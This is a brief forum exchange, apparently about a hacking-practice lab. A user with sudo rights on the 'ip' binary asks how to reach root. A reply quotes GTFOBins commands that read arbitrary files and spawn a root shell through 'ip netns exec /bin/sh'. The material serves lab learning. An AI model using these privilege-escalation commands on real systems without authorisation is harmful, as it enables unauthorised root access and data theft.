Hi,
I got the sudo -l info below, but unable to return the root access, any idea?
xxx@yyy:~$ sudo -l
Matching Defaults entries for xxx on yyy:
env_reset, mail_badpass, secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
User xxx may run the following commands on yyy:
(ALL) NOPASSWD: /usr/sbin/ip
xxx@yyy:~$ sudo ip route /bin/sh (This command is not working)
Command “/bin/sh” is unknown, try “ip route help”.
Use https://gtfobins.github.io. Search any executable, and it’ll tell you if you can do something with File read, SUID, Sudo etc…
According to GTFOBins, for sudo on IP:
It runs in privileged context and may be used to access the file system, escalate or maintain access with elevated privileges if enabled on sudo
.
LFILE=file_to_read
sudo ip -force -batch "$LFILE"
This only works for Linux with CONFIG_NET_NS=y.
sudo ip netns add foo
sudo ip netns exec foo /bin/sh
sudo ip netns delete foo
@clubby789 Thank you so much, this resolved my problem!!! I am new here, how do I +respect you?